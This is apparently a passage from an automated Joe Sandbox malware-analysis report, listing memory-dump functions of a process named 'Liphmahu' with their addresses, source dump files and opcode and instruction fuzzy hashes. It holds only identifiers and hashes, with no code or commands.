Instruction ID: e6b087d1900d5ec37bd65c2c11a0d3a7e2b078983fbe59ef139da06e6f178690
Opcode Fuzzy Hash: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
Instruction Fuzzy Hash: 46E0C974E04208EFCB84DFA9D94469CBBF4FF88310F10C0A9A84993344D635AA51DF80

Function 06C7A840 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
Instruction ID: 77bc4fa9939f0912e4ace60a1132f552a032d374f9172795b29fd7cc56289eff
Opcode Fuzzy Hash: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
Instruction Fuzzy Hash: 97E0C975E04208EFCB84DFA9D54469CBBF4EB48310F10C0AAA85893351E6359E52DF81

Function 06C7DDD0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
Instruction ID: 20e5a10eb19c3933edf94b4199e81069a14f64b6dca8a7480ed9b5f93018e798
Opcode Fuzzy Hash: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
Instruction Fuzzy Hash: 79E0ED74E04208EFCB84DFA9D54469CFBF4EF58310F50C0A9A85993340D635AE51DF95

Function 06C76158 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
Instruction ID: aece0629bc11ff47257281b52003c7374d8c08436d119f853913e8ebd6f4a2ae
Opcode Fuzzy Hash: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
Instruction Fuzzy Hash: 4BE0ED74E04208EFCB84DFA9D54469CFBF4EB48310F10C0AAA84893341D6359A51DF80

Function 05D4A551 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f246a147fa89e22a4fffc941232f5bf8c773e01bfec1047e3f94be44c52c272d
Instruction ID: 6e467e0bdb47fcc31206dd983df0ef44255678d37b66d1005433215d1b5e3659
Opcode Fuzzy Hash: f246a147fa89e22a4fffc941232f5bf8c773e01bfec1047e3f94be44c52c272d
Instruction Fuzzy Hash: 3AE09270D8D188DFCB40DFB8990C39CBFF5EB04200F2440AA9888A3241E6311B55CF00

Function 05D48847 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad15a948e504982ef4ff5d0bf934a89f8e883acfac8f49f3a868acfc29fc571c
Instruction ID: 8f0552b18ee7ab80ce1e35805e06d195c9978b55f7214d62f0031888a799f899
Opcode Fuzzy Hash: ad15a948e504982ef4ff5d0bf934a89f8e883acfac8f49f3a868acfc29fc571c
Instruction Fuzzy Hash: FDF0A030589749CFEB10CB24DC182EEBBB1FF06315F149696C45A672C6D7308A44CF41

Function 05D4BDA0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 001c49080e2d637689ea449d64389abd457098bc9b6c02a3bf21e6100b332e50
Instruction ID: 61285f5d34a429905af73985d6fe0b88084c91b1e5268ad61f61cc6f8e48dce7
Opcode Fuzzy Hash: 001c49080e2d637689ea449d64389abd457098bc9b6c02a3bf21e6100b332e50
Instruction Fuzzy Hash: ACE0E574E08208EFCB84DFA8D9446ACBBF4EB48310F10C0EA985993340DB359A02CF40

Function 05D4C6B2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d45733b631795f3848f4cd2f677a20417b7dfeccab1bf36dff0c981dfe6c251
Instruction ID: 3da7e594c923bdde8f1cd173b31d128216922109ea52e798ff848c09b8f59a7d
Opcode Fuzzy Hash: 4d45733b631795f3848f4cd2f677a20417b7dfeccab1bf36dff0c981dfe6c251
Instruction Fuzzy Hash: 60F0D434905208CFEB94DF58D944B99BBF2FB55300F1480AAD009A7254DB31AA85CF00

Function 05D42410 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8a3a09dd70bb9adf3456450f45575c07d86b71c929dc37ec834e0dd2de76ef
Instruction ID: 7f32576a7c5f5126d3111d7f61595e8c6dab244dfa51893a5f42c234e661e8d0
Opcode Fuzzy Hash: 0a8a3a09dd70bb9adf3456450f45575c07d86b71c929dc37ec834e0dd2de76ef
Instruction Fuzzy Hash: 2BE01A78D08208EFCB45DFD9D940AACFBB5EB98310F10C0AAEC8853381D6359A52DF94

Function 05D41F38 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8a3a09dd70bb9adf3456450f45575c07d86b71c929dc37ec834e0dd2de76ef
Instruction ID: f1f423fa141615a750ec8b539e13b52ae7eae0e6f73d23c827d4fe35a43597f8
Opcode Fuzzy Hash: 0a8a3a09dd70bb9adf3456450f45575c07d86b71c929dc37ec834e0dd2de76ef
Instruction Fuzzy Hash: FDE0E575D08208EBCB44DFD8D9446ACBBB9EB48311F10C1AAE88853351D6359A56EF84

Function 05D4D618 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8946369e5177c1bddcfa718d1c359ced8079498c43588a4983254da59180b07
Instruction ID: 4d824d8763c9c34444d15bee04ad721531fb542a70068d4568b7935d4f7ceb94
Opcode Fuzzy Hash: f8946369e5177c1bddcfa718d1c359ced8079498c43588a4983254da59180b07
Instruction Fuzzy Hash: 4EE0D834509348AFCB00DB78D81154CBFB6DF41300B004199D408D3746D6725E089761

Function 05D468EA Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b78237d96a65e2da39b1a319e658900608c1856d436d9e84f64fe7c380d1868f
Instruction ID: 007851d0a2914404e0662121d036d6d9f41521f80d6cb4e6f2ca10d0b21d0d64
Opcode Fuzzy Hash: b78237d96a65e2da39b1a319e658900608c1856d436d9e84f64fe7c380d1868f
Instruction Fuzzy Hash: E5F0C274E81268CFEF20DF55E909BE9B7B1BB89716F1140E6D149E6200C3744ADA8F12

Function 05D61E30 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c06452c1a116978116515bb563846df7034154b49f7c5322dd72163beb8c41c9
Instruction ID: ec9c34d77357268b72378be85b2600f96d3965fd59d1941c337278fa02747d3d
Opcode Fuzzy Hash: c06452c1a116978116515bb563846df7034154b49f7c5322dd72163beb8c41c9
Instruction Fuzzy Hash: 51D05B317843159BDF2066E19C01F71739DAB06A22F90446BE9055F281D972F843C7B1

Function 06C78E08 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9e420273253ba06c5373f9d311521f8bdab77fff3c4df7603e4d7a8734dd1c
Instruction ID: 691112ff4623ca502d5308fad7cdabe1abc5f09404bbae458e6b4206a9a3ab36
Opcode Fuzzy Hash: ed9e420273253ba06c5373f9d311521f8bdab77fff3c4df7603e4d7a8734dd1c
Instruction Fuzzy Hash: 25E01A74D05108AFC784DF99D5445ACFBB4EB48200F10C0A9984853341DB355A02DF80

Function 05D4CC88 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833960b257a8dfdf390e6ccc2cd012c1cabd75e353d74eab35af75efdfdb8fae
Instruction ID: 949b509d770ddabd2212fc11909c9360671ba3b11350ad820c492cf6f4aa0669
Opcode Fuzzy Hash: 833960b257a8dfdf390e6ccc2cd012c1cabd75e353d74eab35af75efdfdb8fae
Instruction Fuzzy Hash: F9E08674909108EBC704DF94D9449ACBB75EB45310F10D099EC4553350D6329E52DF84

Function 05D4B730 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e59408b3b6396cd4ae5479b578f0b0e379ee4b6c70df32f4ae103b51cf8167
Instruction ID: ec496b010e91851987e0ce5e72259efb2a62ccdc4f023970e0ef5bb3676e6882
Opcode Fuzzy Hash: 32e59408b3b6396cd4ae5479b578f0b0e379ee4b6c70df32f4ae103b51cf8167
Instruction Fuzzy Hash: DCE0E674D05208DFCB84DFA8D94569DBBF5EB48215F2081AAD84DD7341E631DE45CF41

Function 06970478 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216163397.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6970000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5140bfa6b824910366c59a925fe0796acdb367a26b846efc8377313c8197d774
Instruction ID: 1ac09511b52cce2c5f2113f4fd30e95666765d069919cbe6c84dff120333c7b3
Opcode Fuzzy Hash: 5140bfa6b824910366c59a925fe0796acdb367a26b846efc8377313c8197d774
Instruction Fuzzy Hash: 4DE0C274D08108DBC744DF94E9409ACBBB8EB45300F20D0ECD80817341DA315E02DB80

Function 06C7E398 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66321e64e507afe2b49e7ec93ee31bf7f31de3938d4abc984d69f0acf81b3a76
Instruction ID: c773a7a8f6cf085cb776d64da35335513ccd45b5c34446157dc64b3bf7d8c55d
Opcode Fuzzy Hash: 66321e64e507afe2b49e7ec93ee31bf7f31de3938d4abc984d69f0acf81b3a76
Instruction Fuzzy Hash: B4E0C235D08108EBC744EF94E9419ACBBB8EB49300F10D1DDD80913390CA315E42CF80

Function 06C7B7B8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ca283afe0c6bd2361c91899840b3a7755a8e076c3bdd494061c3f9fbfbf37f
Instruction ID: 954f49a445b6401079ef4e4b0933af3c850d36affd061a6eb2fc973e6aaa24be
Opcode Fuzzy Hash: d5ca283afe0c6bd2361c91899840b3a7755a8e076c3bdd494061c3f9fbfbf37f
Instruction Fuzzy Hash: F9E0C27188110CDBC7C0FFF4A90469E77E8DB05200F8045A9D50093110ED714A159BA2

Function 06C63120 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13c5955db16302a2d7bc078356c90d67328ad11280929495753fdcfd9072f22d
Instruction ID: e3aa3821eb79d61d2dca18c6192651edcbf59edef3d471607141477837060697
Opcode Fuzzy Hash: 13c5955db16302a2d7bc078356c90d67328ad11280929495753fdcfd9072f22d
Instruction Fuzzy Hash: 99E065B0A58018CFD368EBA4C8587AD7BB6FB84308F1040A9B50AA7381DF305E458F45

Function 05D4A560 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75dde73abaa0b80181d5fb4b80d7511b1f6de15ec1c62e545cea2bef2a16c52e
Instruction ID: fc95eb799de0b8cfac195f7f30bd458eb7f3d16b3fee265ed66f815f8d481323
Opcode Fuzzy Hash: 75dde73abaa0b80181d5fb4b80d7511b1f6de15ec1c62e545cea2bef2a16c52e
Instruction Fuzzy Hash: EAE0EC74D89248DFCB40DFA8EA4969CBBF5AB08201F1090AA9849A3250EA705A54CF41

Function 05D40340 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9f0eb58e2e8b5f64fec5ca075cd4c2b0f4397c34f8073de88aff441a103c713
Instruction ID: 9acef63b6810eaf7329b277292e9d1c012a5750e35766b26bfe8d92c4d537010
Opcode Fuzzy Hash: c9f0eb58e2e8b5f64fec5ca075cd4c2b0f4397c34f8073de88aff441a103c713
Instruction Fuzzy Hash: AFE0C27188110CDFC780FFF49908A9D7BE8DB05200F8055B9950193150ED718A119B96

Function 05D4B4EC Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 441a6ea9ada388783df92c1df11ba6be4ca79b89f592e3dfe93c34ee9f093103
Instruction ID: 5042110a834d5a25474eabcca76492f1aa55c300a7237c91daa2f242fae385cb
Opcode Fuzzy Hash: 441a6ea9ada388783df92c1df11ba6be4ca79b89f592e3dfe93c34ee9f093103
Instruction Fuzzy Hash: 3BE01A70A44258CFDB24DF20D888BDDBBB2FB08311F614186944DA3204DB309E81CF01

Function 05D4AEA2 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e99b63e46dc65c5f6d864d452c5071f043836918b41a727af867744f9eb7d32
Instruction ID: b8ca9f78b4eb91f5761f3e68ecbb6c2281fce36e42ce674ed8653ab095f5782e
Opcode Fuzzy Hash: 0e99b63e46dc65c5f6d864d452c5071f043836918b41a727af867744f9eb7d32
Instruction Fuzzy Hash: 2EE0E574A48648DFEB44EF88E088BAD7FF2FB14714F91002AE005AB344D7709985CF05

Function 05D4D628 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc6c996bd120c193b83b97af3e8395f111f477c4f178c8a6fe227fb0f17dc89
Instruction ID: 803d36c88231d0b6113e9df92dab6f13812e69fe968554187ea8088a6eaa68c2
Opcode Fuzzy Hash: fcc6c996bd120c193b83b97af3e8395f111f477c4f178c8a6fe227fb0f17dc89
Instruction Fuzzy Hash: ADE05B34A0020DEFCB00EFB8D95169DB7F5EB44314F5041A9D808D3705DA316F499B91

Function 05D4AB89 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3d2d8693e9a2aaf961e41963e386c22c2d17b6219a553a0a938abcc74c1c85
Instruction ID: 801422e46f0df0d2043234d386bd5f8a16826c51cfef2b7f886598eb6c5c9f52
Opcode Fuzzy Hash: 4d3d2d8693e9a2aaf961e41963e386c22c2d17b6219a553a0a938abcc74c1c85
Instruction Fuzzy Hash: 75E0E534A041189FD790EF64D898BDDBBB2EF59311F508099A589AB344CF705EC5CF45

Function 05D4AD93 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bba1d0ca98bc049b136dd81240a5b3c75453dc413c7bc7a7142d88c270ffaf22
Instruction ID: 87b1c0024838920ebbc16609608f2a25a844ee9416899343f275b1d1566ab7e4
Opcode Fuzzy Hash: bba1d0ca98bc049b136dd81240a5b3c75453dc413c7bc7a7142d88c270ffaf22
Instruction Fuzzy Hash: DAE01AB4A04118DFD714EFA4D9846DCBBB2EF55301F504199A949BB351DB706EC5CF01

Function 05D4AC56 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79c06b2b9c8d2e61f3b3ca28078618764baa575eb673eb95844591af7222424
Instruction ID: e7fa0855700495191deeaef57646560d3410ff0d8f916f4b1607bb5e901ca84c
Opcode Fuzzy Hash: e79c06b2b9c8d2e61f3b3ca28078618764baa575eb673eb95844591af7222424
Instruction Fuzzy Hash: 8FE01A34A442188FC7A4EF64D89479CBBB3FB48300F508099A50ABB390DB306E89CF02

Function 05D4B471 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb98757237adcc566f556d195426926bfd5df24e4edf34d40a1dbb596524de62
Instruction ID: cb18d324019ffcff37ea887b7724c12a12a55a00e4e352910704c03e86b4338e
Opcode Fuzzy Hash: bb98757237adcc566f556d195426926bfd5df24e4edf34d40a1dbb596524de62
Instruction Fuzzy Hash: 40E09A30A44209CFD764EF64C8507EC7BB2EB44302F5081A9A21EB7340EB301E89CF01

Function 05D4B05B Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9d5733e66927711007af2016ab880df7bce1d1fa984603a46cd06c4db2616c2
Instruction ID: e4e18358b93be8d3a64eae343fd404b75100721836a8d790f403ba577b06ca81
Opcode Fuzzy Hash: b9d5733e66927711007af2016ab880df7bce1d1fa984603a46cd06c4db2616c2
Instruction Fuzzy Hash: B3E01A70A40658CFD714EFA4D854B9D7BB2FB89306F10809A950ABB384DB306E84CF61

Function 05D4B2CF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b1cdaa35755bde7f1c232cce2e1483ad931c27f45c41c1f8fe5d54c9e48b2a0
Instruction ID: dba36db0714428de416e978b0b5bf416e8acf72a0ff9140c5785e2c88cf2ccdd
Opcode Fuzzy Hash: 8b1cdaa35755bde7f1c232cce2e1483ad931c27f45c41c1f8fe5d54c9e48b2a0
Instruction Fuzzy Hash: 43E01A30A40318DFD754EF54EC44B9E7BB2EB86301F214098910AB7345DB315E80CF12

Function 05D6ACE1 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f86191dab32fa051ca1534426d16ca2e871ea607dd1da6e88abc9735e39034
Instruction ID: 321d0c5e43593508517f6aef5fbadbbdd5d133829c6d889153d336a4390560cb
Opcode Fuzzy Hash: d7f86191dab32fa051ca1534426d16ca2e871ea607dd1da6e88abc9735e39034
Instruction Fuzzy Hash: 52D012761502589FC700CB64D845F457B76EB192A5F2980A5F9088B332C622F824D798

Function 05D44C51 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e80eebf3b179f9e7137f6c507aae6fa0b536288f8c7794bb1fade2c1e694fd7
Instruction ID: b9c020ec59cffc09fa9c94717709a00f27987312b8ae53f2bdccecc0cfae1dce
Opcode Fuzzy Hash: 1e80eebf3b179f9e7137f6c507aae6fa0b536288f8c7794bb1fade2c1e694fd7
Instruction Fuzzy Hash: 0DD01770A803188FDB10EB25C804AA97EF2FB41300F10829AC446AB348DB308A848F81

Function 05D44A8F Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13d4a1bb0493d70dd662bddcb9865fff18db8d84159bede81453e7c8d8fccd2
Instruction ID: b9c020ec59cffc09fa9c94717709a00f27987312b8ae53f2bdccecc0cfae1dce
Opcode Fuzzy Hash: b13d4a1bb0493d70dd662bddcb9865fff18db8d84159bede81453e7c8d8fccd2
Instruction Fuzzy Hash: 0DD01770A803188FDB10EB25C804AA97EF2FB41300F10829AC446AB348DB308A848F81

Function 05D4B36F Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 874512c63f5911652bbef3c4a551a28699d349b3ad52a0342bbbe38d90524c9f
Instruction ID: 3c36a049c6bd6d1f7f20eefa9022863f1796af525a6fa06f7a464a1025cd21df
Opcode Fuzzy Hash: 874512c63f5911652bbef3c4a551a28699d349b3ad52a0342bbbe38d90524c9f
Instruction Fuzzy Hash: 22D06C70A0A358DFDB11EF24ED88A9E7BB2EB66304F11408A9049A7256C6359E858F16

Function 05D6CFF9 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 337f932998baf58d3f8e9db71f8b19d30adaea3ca4fbf92adfcce8ce5e4d4287
Instruction ID: 9b4f1b30d716e8d81f33bbab0dcfe7d3b506370aa0373a36d90f05511c428f6c
Opcode Fuzzy Hash: 337f932998baf58d3f8e9db71f8b19d30adaea3ca4fbf92adfcce8ce5e4d4287
Instruction Fuzzy Hash: 02D0C9B26542089FC300DB64D8149457B69AB65655B1640A6E9046B2B2E637D4109A54

Function 05D60208 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62d932eb1b5c584ee1ae5556affdc6fd341d40b7e71175ca7670cb549c1b41e
Instruction ID: 1e7c51184d3f40c89deb2e145e67e54067cfd880609d60b738540784ad5f8912
Opcode Fuzzy Hash: e62d932eb1b5c584ee1ae5556affdc6fd341d40b7e71175ca7670cb549c1b41e
Instruction Fuzzy Hash: 8AC012310086118FCB28EB28F544C86B7A6EF4030030189AAE00A8B325CB70EC85CB80

Function 05D6F1D0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05947b75d8097f715adeb53994b890473e504b0e4a4b10c4a988a9b67706ad58
Instruction ID: 44276d0c86607e67c667245f934f9744348b59b95f54a432c6005a7181ed30f1
Opcode Fuzzy Hash: 05947b75d8097f715adeb53994b890473e504b0e4a4b10c4a988a9b67706ad58
Instruction Fuzzy Hash: 52D0123714A2C59FC706CB34E8648947F31FF6A20570C8097E085C7172CA229456DB54

